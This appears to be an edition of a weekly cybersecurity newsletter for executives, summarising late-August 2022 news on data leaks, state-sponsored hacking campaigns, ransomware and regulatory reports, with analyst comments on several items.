Strategic insights for leaders from tactical cyber observers.
As the world becomes increasingly dependent on the internet and cyberspace remains a contested environment, leaders must monitor geopolitical and cybersecurity risks more than ever. LookingGlass presents the Cyber Monitor – a weekly rollup of analysis and trending topics in cybersecurity for executives to keep abreast of threats, incidents, and risks to their organization and national security.
TABLE OF CONTENTS
- EDITOR’S HIGHLIGHTS
- NATION STATE ACTIVITY
- CRITICAL INFRASTRUCTURE
→ NATO officials have stated that they are attempting to assess the impact of a security breach at the French arms manufacturer MBDA Missile Systems. The leaked data includes blueprints of weapons used by Ukraine in its current war with Russia. Integrated defense company MBDA Missile Systems, headquartered in France, has acknowledged that data from its systems is a part of the cache being sold by threat actors on hacker forums after what appears to be a ransomware attack. MBDA initially denied being hacked on August 1, but had to retract its claim after hackers began selling more than 80GB of internal files, including weapons design systems, for 15 BTC. Although the company told the BBC that the data was not sensitive, the British news outlet discovered documents labeled “NATO CONFIDENTIAL,” “NATO RESTRICTED,” and “Unclassified Controlled Information” in the files for sale online. Risky Biz Dark Reading
Analyst Comment: As reported in one of the previous editions of LookingGlass Cyber Monitor, MBDA Missile System leaks were offered for sale by Breached Forums user under alias andrastea. As of August 24, 2022, adrastea lowered the price for the data down to 0.5 BTC for the buyer willing to purchase all of the data at once. Such a significant drop in the price may suggest that other threat actors did not find the data useful, and that some of andrastea’s claims regarding the significance of the data, are false. The most recent update of the thread states that samples of the data are no longer accessible due to the account ban by MEGA (a cloud storage and file hosting service commonly used by cyber criminals). According to andrastea, the files will be soon published on Telegram. LookingGlass continues to monitor the situation. As a point of reference, US CUI (Controlled Unclassified Information), the equivalent of the claimed leaked documents, are required to have a password.
→ Russia’s major streaming platform START suffered a major data leak, impacting its 44 million users. A Telegram channel known as Information Leaks first disclosed the breach, saying that a 72 GB database containing information on 43,937,127 users worldwide can now be found in open access. The streaming company said on Telegram that the leaked information in the database is not completely up to date, with the data in it dating back to 2021. Although START claimed that “the database is not of great interest to attackers,” Information Leaks said that the stolen data includes first/last names, email addresses, hashed passwords, IP addresses, countries, start/end date of subscriptions, and last login. START is a subscription-based international streaming service with subscribers in 174 countries co-owned by MegaFon, Russia’s second-largest mobile phone operator. It currently remains unclear who is responsible for the attack. cybernews
Analyst Comment: “Information Leaks” is a Telegram channel that reports recent data leaks and breaches, primarily those that affect organizations located in Russia and Belarus, occasionally covering stories regarding breaches affecting organizations in Ukraine and other countries. While many sources cite “Information Leaks” as the original source that disclosed the breach of START, LookingGlass observed it first being published on Breached Forums by someone using the alias RuPeaceDa. The choice of the alias in this case is interesting and clever, considering that an English speaker will likely see it as a message calling for peace, while a native Russian speaker can recognize an offensive way of saying that “This is the end of RU[ssia]”. For these reasons, we assess the data was likely leaked by pro-Ukrainian hacktivists.
NATION STATE ACTIVITY
→ Iranian hacker group MuddyWater is continuing to exploit the Log4j vulnerability to gain access to corporate networks in Israel amid an ongoing proxy war between the two countries, according to new research. The threat actor, which is also known as Mercury, has targeted vulnerabilities in SysAid, a popular IT management software used by many Israeli organizations, according to a report published by Microsoft on Thursday, August 25. US Cyber Command said earlier this year that the group is affiliated with the Iranian Ministry of Intelligence and Security. In December, the group targeted telecommunication and IT service providers in the Middle East and Asia. MuddyWater’s new attack, detected by Microsoft in late July, is another example of state-sponsored operations exploiting Log4Shell, a vulnerability in the Java library Log4j used to add logging capabilities to web and desktop applications. Earlier in December, Microsoft discovered that nation-state groups from China, Iran, North Korea, and Turkey were abusing Log4Shell to gain access to targeted networks. The Record
→ Montenegro’s security agency warned Friday, August 26, that hackers from Russia have launched a massive, coordinated cyberattack against the small nation’s government and its services. The Agency for National Security, or ANB, said Montenegro is “under a hybrid war.” The Adriatic Sea state, once considered a strong Russian ally, joined NATO in 2017 despite strong opposition from Moscow. It has also joined Western sanctions against Russia for its invasion of Ukraine. In addition to most European countries, Russia has added Montenegro to its list of “enemy states” for acting against the Kremlin’s interests. The Montenegrin government earlier last week reported the first of a series of cyberattacks on its servers but said it managed to prevent any damage. However, the attack seems to be ongoing. The US embassy in Montenegro warned that the attack may disrupt the public utility, transportation (including border crossings and airport), and telecommunication sectors. Local10
Analyst Comment: Cuba Ransomware has listed the Parliament of Montenegro on their data leak site. In the victim posting, the Department for Public Relations is described so it is possible that they were the only ones attacked. The date of the compromise is listed as August 19, 2022.
→ In early 2022, Kaspersky observed the Kimsuky threat actor group targeting primarily Korea-related entities. This group was attacking the media and a think-tank in South Korea – Kaspersky reported technical details to their threat intelligence customer. In its new attack, the actor initiated the infection chain by sending a spear-phishing email containing a macro-embedded Word document. Various examples of different Word documents were uncovered, each showing different decoy contents related to geopolitical issues on the Korean Peninsula. The actor took advantage of the HTML Application file format to infect the victim and occasionally used the Hangeul decoy document. After the initial infection, a Visual Basic Script was delivered to the victim. In this process, the actor abused a legitimate blog service to host a malicious script with an encoded format. The implanted VBS file is capable of reporting information about infected machines and downloading additional payloads with an encoded format. The final stage is a Windows executable-type malware that is capable of stealing information from the victim such as file lists, user keystrokes, and stored web browser login credentials. According to Kaspersky, the targets of this operation are people or entities related to politics or diplomatic activities. The Kimsuky group has been known to target these same groups in the past along with journalists, professors, and North Korean defectors. Securelist
Analyst Comment: One of the most notable findings of this recent research is the evolution of safeguards that the threat actor implements to make sure that malicious payloads are downloaded by valid targets, not security researchers. C2 checks are performed by the attacker at each step of the infection, including checking for the existence of the unusual “chnome” string – Kaspersky researchers were unable to move past this step of validation process. This finding demonstrates an evolution of methods that threat actors employ to hinder analysis.
→ A study published last week puts numbers and research behind the theory that the majority of hacktivist activity surrounding the Russian-Ukrainian conflict was and continues to be poorly coordinated, with no real impact on the “cyberwar” between the two countries. The study, “Getting Bored of Cyberwar: Exploring the Role of the Cybercrime Underground in the Russia-Ukraine Conflict,” examined data from two months before and four months after the war began. Researchers from three universities in the UK not only analyzed website defacements, DDoS attacks, and hundreds of announcements in Telegram channels, but also conducted interviews with those responsible for the attacks. Both legitimate IT workers and members of the cybercrime underground were drawn into the conflict as hacktivist militant forces, as was hypothesized at the outset of the study. In the weeks following Russia’s invasion of Ukraine, however, cybercriminal groups lost interest, according to the findings of researchers. According to an analysis of the activity, the majority of defacements occurred at the beginning of the war, while DDOS attacks lasted longer “possibly due to the widespread availability of cheap DoS-for-hire services.” The participants’ reliance on commercially available equipment suggests that they were, at best, inexperienced actors. As time passed, the researchers found no “hard” evidence that the cybercrime underground was having a significant impact on the cyberwar in comparison to the damage caused by the actual kinetic war. Risky Biz
Analyst Comment: LookingGlass findings confirm some of the results obtained by the researchers in the UK. While some groups claim to have a military-like organization and structure, in some cases it falls apart due to personal conflicts and differences in views between their members. LGC has also observed occasional false claims regarding the victim targets and the magnitude of the attacks. More sophisticated cybercriminals also often motivated by financial gain, while attracting the least amount of attention, which could explain why more sophisticated cybercriminals have largely avoided getting involved in the Russia-Ukraine conflict.
→ A new malware campaign disguised as Google Translate or MP3 downloader programs was found distributing cryptocurrency mining malware across 11 countries. The fake applications are being distributed through legitimate free software sites, providing broad exposure to the malicious applications to both regular visitors of the sites and search engines. According to a report by Check Point, the malware is created by a developer named ‘Nitrokod,’ which at first look appears to be clean of malware and provides the advertised functionality. However, Check Point says the software purposely delays the installation of the malicious malware components for up to a month to evade detection. Nitrokod’s offerings rank high in Google Search results, so the website acts as an excellent trap for users seeking a specific utility. Additionally, as Check Point discovered, Nitrokod’s Google Translate applet was also uploaded on Softpedia, where it reached over 112k downloads. Bleeping Computer
→ On August 28 and 29, Italy’s energy agency Gestore dei Servizi Energetici SpA was the target of a malware attack. According to a statement, GSE’s IT systems and websites were shut down to protect the data. The agency’s role as a last-resort gas buyer for Italy’s power grid has not been jeopardized. The extent of the attack and the type of data compromised are still being assessed by Italian police and cybersecurity authorities, according to a GSE spokesperson. Among other functions, GSE is one of the government agencies in charge of the running of Italy’s electricity market. Bloomberg
Analyst Comment: While this is an ongoing investigation, and many details remain unknown, Italian media specifies that it was a ransomware attack. An Italian daily newspaper Repubblica reported a claim made by an intelligence source they interviewed stating “There are strong elements to say that the attack came from the East, probably from Russia”.
→ Ransomware attacks, nation-state infiltrations, and third-party access ranked first on the list of potential cybersecurity threats to the financial sector in the US, according to the Federal Reserve. The Federal Reserve Board published its annual “Cybersecurity and Financial System Resilience” report earlier this month, citing ransomware as one of the most advanced threats facing the financial sector, especially as threat actors increasingly automate it to be a service. “Like traditional ransomware, ransomware as a service (RaaS) is an increasing concern with added sophistication, speed of proliferation, and difficulty of attribution,” according to the report. “RaaS allows threat actors to create ‘franchised’ threat offerings. Sophisticated threat actors license the use of their software to other malicious actors, often for a percentage of the ransom.” DDoS attacks were also pointed to as a growing issue for the financial sector, according to the report. Ongoing violence in the Ukraine will also impact the US financial sector’s cyber stability, as will the potential access of the many third parties that banks and other financial institutions’ use. “Geopolitical events, such as the Russian invasion of Ukraine, have led to the potential for [an] increase in cyberattacks that may impact critical infrastructure including the financial services sector,” according to the report. SC Magazine
Analyst Comment: According to LookingGlass research of statements made by cybercriminals in underground environments, while many cybercriminals choose to avoid targeting healthcare, energy sector, educational institutions, and the government, financial organizations are always seen as valid targets by cybercriminals. According to the most recent Sophos State of Ransomware whitepaper, financial services organizations have one of the lowest ransom payout rates (32%), meaning that targeting financial services may not be the most lucrative for ransomware threat actors. However, there are other ways both financially motivated and nation state threat actors can benefit from targeting the financial services sector, including theft of PII and customer account information, opening additional avenues for fraud, as well as political and ideological leverage.
→ Cyberattacks are increasingly being focused on smaller healthcare companies and specialty clinics without the resources to protect themselves, instead of larger health systems, according to a new report from Critical Insight. Approximately 20M people were affected in the first half of this year, marking the third consecutive quarter of breach decline and a 28% decrease from the same period last year. Healthcare providers, business associates (companies that handle data on behalf of providers and insurers), and health plans account for 73%, 15%, and 12%, respectively, of total breaches. Breaches involving healthcare providers decreased from 269 in the first half of 2021 to 238 in the first half of 2022. That shift, from “large hospital systems and payers to smaller entities that truly have a deficit when it comes to cyber defenses, shows a massive change in victims and approach,” John Delano, healthcare cybersecurity strategist at Critical Insight and Vice President at Christus Health, said in a statement on the report. Healthcare Dive
→ US military and intelligence entities are renewing their efforts to protect electoral procedures from hacking and disinformation before and during the November midterms elections. The news comes from the US Cyber Command and the NSA, who published a joint blog post detailing their security capabilities on Thursday, August 25. The Election Security Group (ESG) operates under the guidance of USCYBERCOM’s co-lead and deputy commander of cyber national mission force Victor Macias and Anna Horrigan, NSA’s senior executive and election security co-lead. ESG’s primary goals are to monitor and research foreign adversaries who may interfere with or influence elections. The group also bolsters domestic defense by sharing information with allied partners and imposing sanctions on foreign actors who seek to undermine democratic processes. The partnership comes weeks after the US Cybersecurity and Infrastructure Security Agency (CISA) compiled and released a list of free cybersecurity tools for the election community. Info Security
→ DHS is making progress on a list of ten recommendations from the agency’s inspector general to make improvements to internal cybersecurity policies and employee training practices, according to an August 22 IG report that covers audit results reaching as far back as fiscal year 2019. The report delivered to DHS Chief Information Officer Eric Hysen features the ten recommendations designed to improve the Department’s mitigation of risk related to malware, ransomware, and phishing attacks. DHS concurred with all ten recommendations, and the IG report says that the agency’s corrective actions have left half of the recommendations “closed and resolved,” and the other half “open and resolved” pending full implementation of the recommendations. At the heart of the IG recommendations are two issues. The first is DHS’ need to revise security policies and procedures to reflect the latest standards by the National Institute of Standards and Technology (NIST), and the second is to get up to speed on educating DHS personnel across various components on the risks from malware, ransomware, and phishing attacks. The IG report also provides some revealing statistics on how often DHS is targeted by cyber attacks. It said the DHS CIO office reported more than 3k “cyber incidents” reported by agency components between September 2017 and March 2021. Those incidents included 115 malware, ransomware, and phishing incidents, according to the IG. Meritalk
→ Vulnerabilities in decentralized finance (DeFi) platforms are being exploited by cybercriminals to steal cryptocurrency, the FBI warned Monday, August 29. DeFi platforms generally rely on smart contracts, which are automated agreements that lack an intermediary, like a broker. However, that has left many platforms, and the assets investors entrust to them, at risk. “Cyber criminals seek to take advantage of investors’ increased interest in cryptocurrencies, as well as the complexity of cross-chain functionality and open-source nature of DeFi platforms,” the agency warned in a public service announcement. In March, Ronin Network announced attackers stole cryptocurrency worth hundreds of millions of dollars in a DeFi hack later attributed to North Korean hackers. Other DeFi platforms, including Deus Finance, Rari Capital, Saddle Finance, and Inverse Finance, have also suffered thefts. The FBI said it has observed attackers use several different tactics, including exploiting vulnerabilities related to signature verification and flash loans — smart contracts that enable conditional instant lending. The agency included advice for investors. The Record
Analyst Comment: Cybercriminals are always drawn to new lucrative types of activity. With DeFi platforms becoming more commonly used by the general population, threat actors will have more opportunities to target them. While removing the middleman is often seen as an advantage of DeFi platforms, it also means that there is a lack of regulation and insurance offered by traditional financial services, making it important to research DeFi platforms and their potential vulnerabilities prior to utilizing them.
→ Chinese hackers likely targeted energy companies operating in the South China Sea and the Australian government, the latest accusation of coordinated cyberespionage by China to advance its geopolitical goals, according to US cybersecurity firm Proofpoint. Researchers discovered a year-long phishing campaign aimed at projects such as the Kasawari gas field and a wind farm in the Taiwan Strait. The researchers stated that it had “moderate confidence” that the hacking was carried out by a group known as TA423, which is based in China and is motivated by espionage. The report stated that emails used in the phishing campaign impersonated Australian media organizations including The Australian and Herald Sun to deliver ScanBox malware. PwC Threat Intelligence, which assisted Proofpoint in its research, “assesses it is highly likely that ScanBox is shared privately amongst multiple China-based threat actors.” A ScanBox campaign running from April to June targeted agencies of the Australian government at both the local and federal level, according to the report. An earlier phishing effort centered on a European maker of heavy equipment for a wind farm in the Taiwan Strait, the report added. According to Proofpoint’s VP of threat research and detection, TA423’s “focus on naval issues is likely to remain a constant priority in places like Malaysia, Singapore, Taiwan and Australia.” Bloomberg
→ A massive Chinese database storing millions of faces and vehicle license plates was left exposed on the internet for months before it disappeared in August. At its peak the database held over 800M records, representing one of the biggest known data security lapses of the year by scale, second to a massive data leak of 1B records from a Shanghai police database in June. In both cases, the data was likely exposed inadvertently and as a result of human error. The exposed data belongs to a tech company called Xinai Electronics based in Hangzhou on China’s east coast. The company builds systems for controlling access for people and vehicles to workplaces, schools, construction sites, and parking garages across China. Security researcher Anurag Sen found the company’s exposed database on an Alibaba-hosted server in China. The database included links to high-resolution photos of faces, including construction workers entering building sites and office visitors checking in and other personal information, such as the person’s name, age, and sex, along with resident ID numbers, which are China’s answer to national identity cards. The database also had records of vehicle license plates collected by Xinai cameras in parking garages, driveways, and other office entry points. An undated ransom note left behind by a data extortionist claimed to have stolen the contents of the database, who said they would restore the data in exchange for a few hundred dollars worth of cryptocurrency. It’s not known if the extortionist stole or deleted any data, but the blockchain address left in the ransom note shows it hasn’t yet received any funds. TechCrunch
→ 10 of the top 15 mobile carriers collect geolocation data and do not allow customers to opt out, according to the Federal Communications Commission. The carriers’ responses to the FCC’s data collection and retention questions come in response to the agency’s July request for information on geolocation practices in light of concerns about how law enforcement could use phone data to arrest abortion-seekers in states where the procedure is now illegal or will soon be illegal. The FCC received responses from AT&T, Best Buy Health, Charter, Comcast, Consumer Cellular, C-Spire, DISH Network, Google FI, H2O Wireless, Lycramobile, Mint Mobile, Red Pocket, T-Mobile, US Cellular, and Verizon. The firms generally cited the need to comply with law enforcement requests as well as FCC rules as the reason for their inability to allow consumers to opt-out of collection and retention in their responses. The responses also provided insight into the responding companies’ data retention practices, which ranged from two months to five years for cellular tower data. Only seven of the companies explicitly mentioned using encryption to protect that data. However, the agency is not relying on the carriers’ responses. The Enforcement Bureau will conduct follow-up investigations to ensure carriers follow FCC rules requiring them to disclose how they use and share geolocation data. Carriers have previously misled customers about how they use geolocation data. The FCC proposed fines of more than $200M against several major carriers in 2020 for selling customer location data to bail bond companies and other third parties. CyberScoop
→ US regulators have chosen e-commerce giant Alibaba and other US-listed Chinese firms for audit inspections beginning next month, according to sources familiar with the matter. The move follows a landmark audit agreement reached between Beijing and Washington on August 26, which allows US regulators to vet accounting firms in mainland China and Hong Kong, potentially putting an end to a long-running dispute that threatened to delist more than 200 Chinese companies from US stock exchanges. Alibaba has been informed that it is among the first batch of Chinese companies whose audits will be inspected in Hong Kong by the United States’ audit regulatory agency, the Public Company Accounting Oversight Board (PCAOB). The audit work inspection was also communicated to PwC, the accounting firm of Alibaba. Reuters